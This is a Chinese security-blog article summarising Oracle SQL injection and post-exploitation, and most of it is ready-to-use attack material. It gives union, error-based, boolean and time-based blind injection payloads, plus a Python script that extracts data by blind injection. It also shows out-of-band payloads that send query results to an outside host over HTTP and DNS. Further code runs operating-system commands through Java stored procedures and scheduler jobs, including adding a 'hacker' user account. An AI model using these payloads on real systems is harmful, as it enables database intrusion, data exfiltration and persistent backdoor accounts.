干货 | Oracle注入和漏洞利用姿势总结

admin 2023年1月16日15:47:22安全文章干货 | Oracle注入和漏洞利用姿势总结已关闭评论6 views13014字阅读43分22秒阅读模式

基础介绍

Oracle Database,又名 Oracle RDBMS,或简称 Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说 Oracle 数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。

Oracle 信息收集

  • • 查询数据库版本信息

-- 无需特权
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
-- 需要特权
SELECT version FROM v$instance;
  • • 查询操作系统版本

SELECT banner FROM v$version where banner like 'TNS%';
  • • 查询数据库运行的主机名

-- 需要特权
SELECT UTL_INADDR.get_host_name FROM dual;
-- 需要特权
SELECT host_name FROM v$instance;
-- 需要特权
SELECT UTL_INADDR.get_host_name('127.0.0.1'FROM dual;
  • • 查询当前用户权限的所有数据库

SELECT DISTINCT owner,table_name FROM all_tables WHERE owner=user;
  • • 查询当前数据库名

-- 无需特权
SELECT global_name FROM global_name;
-- 无需特权
SELECT SYS.DATABASE_NAME FROM DUAL;
-- 需要特权
SELECT name FROM v$database;
-- 需要特权
SELECT instance_name FROM v$instance;
  • • 查询数据库所有用户

SELECT username FROM all_users ORDER BY username;
  • • 查询所有 DBA 用户

-- 需要特权
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
  • • 查询当前数据库用户名

SELECT user FROM dual;
  • • 查询当前用户的系统权限

SELECT * FROM session_privs;

用户权限是执行特定类型的 SQL 语句或访问其他用户对象的权利,Oracle 中的权限可以分为系统权限和对象权限。前者是系统规定用户使用数据库的权限,后者是用户对其自己的表或视图的存取修改权限。

Oracle 有超过 100 种不同的系统权限,只有实例管理员或具有 ADMIN 特权的用户才能授予或撤销系统特权,关于每种系统权限的细节,请读者自行查阅其官方文档:System privileges

  • • 查询当前用户名的角色

SELECT * FROM session_privs;

角色相当于一个用户组,其将多个权限和角色组合在一起,以便可以同时向用户授予和撤销它们。必须先为用户启用角色,然后用户才能使用该角色。下表所示为 Oracle 系统常见的角色。

图片
image-20221220154756197

Oracle 注入

联合注入

方法与一般的 SQL 联合注入相同。值得注意的是,Oracle 联合注入一般不使用数字占位,而是 NULL,因为使用数字占位可能会发生错误。

  • • 判断数据库类型

-- 使用 Oracle 专有的函数判断是否为 Oracle 数据库
?ename=-1' or to_char(1)=1--+
?ename=-1'
 or to_number('2e0')=2--+
  • • 查询当前用户下的所有表名

?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1),NULL from dual--+
?ename=-1'
 union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name<>'BONUS'),NULL from dual--+
?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name not in ('BONUS','DEPT')),NULL from dual--+
?ename=-1'
 union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name not in ('BONUS','DEPT','EMP')),NULL from dual--+
?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name not in ('BONUS','DEPT','EMP')),NULL from dual--+
图片
image-20221220182434243
  • • 查询表中的字段名

?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1),NULL from dual--+
?ename=-1'
 union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO')),NULL from dual--+
?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME')),NULL from dual--+
?ename=-1'
 union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB')),NULL from dual--+
?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB','MGR')),NULL from dual--+
?ename=-1'
 union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB','MGR','HIREDATE')),NULL from dual--+
图片
image-20221220161336921
  • • 查询表中具体的数据

?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1),NULL from dual--+
?ename=-1'
 union select NULL,NULL,(select ename from emp where rownum=1 and ename<>'SMITH'),NULL from dual--+
?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename  not in ('SMITH','ALLEN')),NULL from dual--+
?ename=-1'
 union select NULL,NULL,(select ename from emp where rownum=1 and ename  not in ('SMITH','ALLEN','WARD')),NULL from dual--+
?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename  not in ('SMITH','ALLEN','WARD','JONES')),NULL from dual--+
图片
image-20221220182301025

报错注入

MSSQL 数据库是强类型语言数据库,当类型不一致时将会报错,配合子查询即可实现报错注入。前提是服务器允许返回报错信息。

Oracle 数据库的报错注入是通过某些函数报错前进行子查询,再通过错误页面回显查询结果。下面介绍几种常见的报错注入函数的示例。

ctxsys.drithsx.sn

?ename=-1' or 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select user from dual)%7c%7c'~')--+
?ename=-1'
 or 1=ctxsys.drithsx.sn(1,chr(126)%7c%7c(select user from dual)%7c%7cchr(126))--+
?ename=-1' or 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select table_name from user_tables where rownum=1)%7c%7c'~')--+
?ename=-1'
 or 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select table_name from user_tables where rownum=1 and table_name<>'DEPT')%7c%7c'~')--+
图片
image-20221220184103740

XMLType

?ename=-1' or (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null--+

dbms_utility.sqlid_to_sqlhash

?ename=-1' or (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+

ordsys.ord_dicom.getmappingxpath

?ename=-1' or (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+

dbms_xdb_version.*

  • • dbms_xdb_version.checkin

?ename=-1' or (select dbms_xdb_version.checkin('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null--+
  • • bms_xdb_version.makeversioned

?ename=-1' or (select dbms_xdb_version.makeversioned('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null--+
  • • dbms_xdb_version.uncheckout

?ename=-1' or (select dbms_xdb_version.uncheckout('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null--+

utl_inaddr.*

在 Oracle 11g 之前不需要任何权限,在 11g 之后需要当前的数据库用户拥有网络访问权限,否则将被访问控制列表(ACL)拒绝。

  • • utl_inaddr.get_host_name

?ename=-1' or 1=utl_inaddr.get_host_name('~'%7c%7c(select user from dual)%7c%7c'~') --+
  • • utl_inaddr.get_host_address

?ename=-1' or 1=utl_inaddr.get_host_address('~'%7c%7c(select user from dual)%7c%7c'~') --+

布尔盲注

方法与一般的 SQL 布尔盲注相同,使用 ASCII 码逐个比较字符,将返回为 True 的结果输出即可。

?ename=-1' or ascii(substr((select user from dual),1,1))>65--+

下面给出布尔盲注脚本:

import requests
import time

url = 'http://192.168.2.134:8080/search.jsp?ename='

cookies = {  # 如果目标网站要事先登录,就加上cookies吧
    "PHPSESSID""c8ab8r49nd2kk0qfhs0dcaktl3"
}

flag = ''
for i in range(190000):
    low = 32
    high = 128
    mid = (low + high) // 2
    while (low < high):
        payload = url + "-1' or ascii(substr((select user from dual),%d,1))>%d-- " % (i, mid)
        res = requests.get(url=payload)

        """
        data = {
            "user_id": payload
        }
        res = requests.get(url=url, data=data)
        """


        if 'SMITH' in res.text:  # 为真时,即判断正确的时候的条件
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if (mid == 32 or mid == 127):
        break
    flag = flag + chr(mid)
    print(flag)

# S
# SC
# SCO
# SCOT
# SCOTT

时间盲注

Oracle 的 dbms_pipe.receive_message() 函数用来从指定管道获取消息。该函数接收两个参数,第一个参数用来指定管道名称,第二个参数用来指定等待时间。

图片
image-20221220201511688

执行以下 Payload,页面将有 2s 的明显延时。

?ename=SMITH' and 1=(dbms_pipe.receive_message('RDS',2))--+

因此,在 Oracle 数据库中可以通过 dbms_pipe.receive_message() 函数的延时作用来进行时间盲注。由于 Oracle 中没有 if() 函数,因此我们需要使用 decode() 函数或 case when 语句来代替。如下实例,当语句执行成功,页面延时 2s 返回即为 True。

  • • 使用 decode 函数

?ename=SMITH' and 1=decode(substr((select user from dual),1,1),'S',dbms_pipe.receive_message('RDS',2),0)--+
  • • 使用 case when 函数

?ename=SMITH' and 1=(case when (ascii(substr((select user from dual),1,1))>65) then dbms_pipe.receive_message('RDS',2) else 0 end)--+

带外通道(OOB)

带外通道(Out Of Band Channels,OOB)使用一些除常规通道以外的替代的信道来请求服务器资源,一般发送 HTTP 或者 DNS 请求,将查询结果带到请求中,然后监测外网服务器的 HTTP 和 DNS 日志,从日志中获取 SQL 语句的查询结果。这种方式将繁琐的盲注转换成可以直接简便的获取查询结果的方式,尤其是基于时间的盲注,能极大地加快速度。

需要注意的是,常用的可以发起 OOB 函数需要当前的数据库用户拥有网络访问权限。此外,还需要数据库服务器可以出网。

utl_http.request

-- 发起 HTTP 请求
?ename=-1' or 1=utl_http.request('http://192.168.2.135:2333/'%7c%7c(select banner from sys.v_$version where rownum=1))--
图片
image-20221220224413215

utl_inaddr.get_host_address

-- 发起 DNS 请求
?ename=-1' or 1=utl_inaddr.get_host_address((select user from dual)%7c%7c'.btzq7f.dnslog.cn')--+
图片
image-20221220224216939

sys.dbms_ldap.init

?ename=-1' or (select sys.dbms_ldap.init((select user from dual)%7c%7c'.esilh0.dnslog.cn',80) from dual) is not null--+

httpuritype

?ename=-1' or (select httpuritype('http://192.168.2.135:2333/'%7c%7c(select user from dual)).getclob() from dual) is not null--+

Oracle 相关攻击面

Java Source

从 Oracle 8i 开始,Oracle Database 允许在数据库中存储和执行 Java,并提供了 Java 池,用于存放 Java 代码、Java 语句的语法分析表、Java 语句的执行方案和 Java 虚拟机中的数据,以便进行 Java 程序开发。

在实际利用中,如果我们获取了 Oracle 管理员级别的用户凭据,可以使用 SQL 语句直接从 Java 源代码创建函数或存储过程,从而执行系统命令。默认情况下,创建的创建函数或存储过程是在创建者的架构中创建的。

所需的利用条件如下:

  • • 当前用户具有 CREATE SESSION 权限

  • • 当前用户具有相关 Java 权限:

    • • java.io.FilePermission

    • • writeFileDescriptor

    • • readFileDescriptor

对于第一条,普通用户基本都拥有 CREATE SESSION 权限并能够创建函数和存储过程,但是如果想要执行 Java 或通过 Java 执行系统命令,则必须具备这三条权限。在 Oracle 数据库中,只有 DBA 级别的用户默认拥有着三条 Java 权限,其余用户正常情况下需要由管理员来授予,相关命令如下。

-- 授予相关 Java 权限
exec dbms_java.grant_permission( 'UserName''SYS:java.io.FilePermission','<<ALL FILES>>''execute');
exec dbms_java.grant_permission('UserName','SYS:java.lang.RuntimePermission''writeFileDescriptor''');
exec dbms_java.grant_permission('UserName','SYS:java.lang.RuntimePermission''readFileDescriptor''');

-- 撤销相关 Java 权限
exec dbms_java.revoke_permission( 'UserName''SYS:java.io.FilePermission','<<ALL FILES>>''execute');
exec dbms_java.revoke_permission('UserName','SYS:java.lang.RuntimePermission''writeFileDescriptor''');
exec dbms_java.revoke_permission('UserName','SYS:java.lang.RuntimePermission''readFileDescriptor''');

下面笔者通过 Java Source,分别演示创建函数和存储过程的方法。

Function

下面演示创建函数的具体步骤。

(1)创建 Java Source,并命名为 JavaUtil。

create or replace and resolve java source named "JavaUtil" as
import java.io.*;
public class JavaUtil extends Object
{
    public static String ExecCommand(String cmd)
    {
        try {
            BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
            String stemp,str = "";
            while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
            myReader.close();
            return str;
        } catch (Exception e){
            return e.toString();
        }
    }
}
/

(2)从 JavaUtil 创建一个函数 ExecCommand,用于执行系统命令。

create or replace function ExecCommand(cmd in varchar2) return varchar2
as
language java
name 'JavaUtil.ExecCommand(java.lang.String) return String';
/

(3)调用 ExecCommand 函数,执行系统命令,执行结果如下图所示。

select ExecCommand('whoami'from dual;
图片
image-20221221201552607

(4)利用结束后,删除创建的 Java Source 和函数。

drop function ExecCommand;
drop java source "JavaUtil";

Store Procedure

下面演示创建存储过程的具体步骤。值得注意的是,通过存储过程执行命令无法获得执行回显,但可以通过写文件等方式获取执行结果。

(1)创建 Java Source,并命名为 JavaUtil。

create or replace and resolve java source named "JavaUtil" as
import java.lang.*;
import java.io.*;
public class JavaUtil
{
    public static void ExecCommand(String cmd) throws IOException
    {
      Runtime.getRuntime().exec(cmd);
    }
}
/

(2)从 JavaUtil 创建一个存储过程 ExecCommand,用于执行系统命令.

create or replace procedure ExecCommand(cmd varchar2)
as
language java
name 'JavaUtil.ExecCommand(java.lang.String)';
/

(3)执行 ExecCommand 存储过程,在系统上创建一个新用户,执行结果如下图所示。

exec ExecCommand('net user hacker [email protected] /add');
图片
image-20221221201928028

(4)利用结束后,删除创建的 Java Source 和存储过程。

drop procedure ExecCommand;
drop java source "JavaUtil";

Scheduler

在 Oracle 11g 中推出了 Scheduler,这是一个企业作业调度程序,可帮助用户简化数百甚至数千个任务的调度。Oracle 调度程序(Scheduler)是由 DBMS_SCHEDULER PL/SQL 包中的过程和函数实现的。

在实际利用中,如果我们获取了 Oracle 管理员级别的用户凭据,可以通过 DBMS_SCHEDULER 包中存储过程创建程序/作业对象,来调度操作系统的可执行文件或脚本,从而执行系统命令。

所需的利用条件如下:

  • • Oracle 服务器支持 Scheduler

  • • 当前用户具有 DBA 级别的权限。所需的具体系统权限可以参考下图。

图片
image-20221221235158140

下面笔者演示相关利用步骤。

(1)使用 CREATE_PROGRAM 过程创建一个程序,如下所示。

BEGIN
  DBMS_SCHEDULER.CREATE_PROGRAM (
   program_name           => 'EXEC_PROGRAM',
   program_type           => 'EXECUTABLE',
   program_action         => 'net user hacker [email protected] /add',
   number_of_arguments    => 0,
   enabled                => TRUE
  );
END;
/

-- EXEC DBMS_SCHEDULER.CREATE_PROGRAM('EXEC_PROGRAM', 'EXECUTABLE', 'net user hacker [email protected] /add', 0, TRUE);

其中 program_action 是这个程序的行为,它可以是操作系统中的可执行文件或 PL/SQL 的文本。将 enabled 设为 TURE 表示立即启用程序。

默认情况下,程序是在创建者的架构中创建的,为了让其他用户使用该程序,就必须授予他们 EXECUTE 权限。

(2)通过 CREATE_JOB 过程创建作业对象,当作业启动时执行第一步中创建的程序 EXEC_PROGRAM,如下所示。该过程有很多重载,关于不同重载的定义请读者自行查阅其官方文档:CREATE_JOB Procedure

BEGIN
  DBMS_SCHEDULER.CREATE_JOB (
   job_name           =>  'EXEC_JOB',
   program_name       =>  'EXEC_PROGRAM',
   start_date         =>  NULL,
   repeat_interval    =>  NULL,
   end_date           =>  NULL,
   enabled            =>  TRUE,
   auto_drop          =>  TRUE
  );
END;
/

-- EXEC DBMS_SCHEDULER.CREATE_JOB('EXEC_JOB', 'EXEC_PROGRAM', NULL, NULL, NULL, 'DEFAULT_JOB_CLASS', TRUE, TRUE, NULL, 'REGULAR', NULL, NULL);

执行结果如下图所示。

图片
image-20221221224845997

此外,也可以通过 CREATE_JOB 直接创建作业对象来执行命令,无需创建程序对象,如下所示。

BEGIN
 DBMS_SCHEDULER.CREATE_JOB(
   job_name             =>  'EXEC_JOB',
   job_type             =>  'EXECUTABLE',
   job_action           =>  'net user hacker [email protected] /add',
   start_date           =>  NULL,
   repeat_interval      =>  NULL,
   end_date             =>  NULL,
   enabled              =>  TRUE,
   auto_drop            =>  TRUE
 );
END;
/

-- EXEC DBMS_SCHEDULER.CREATE_JOB('EXEC_JOB', 'EXECUTABLE', 'net user hacker [email protected] /add', 0, NULL, NULL, NULL, 'DEFAULT_JOB_CLASS', TRUE, TRUE, NULL, NULL, NULL);

图片


推荐阅读:


干货 | MSSQL注入和漏洞利用姿势总结


实战 | 记一次SSRF攻击内网的实战案例


干货 | 文件上传绕过的一次思路总结学习

实战 | 文件上传漏洞之最全代码检测绕过总结


实战 | WAF-Bypass之SQL注入绕过思路总结

2023年零基础+进阶系统化白帽黑客学习


点赞,转发,在看


原创投稿作者:BuNny

图片

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月16日15:47:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  干货 | Oracle注入和漏洞利用姿势总结 http://cn-sec.com/archives/1518709.html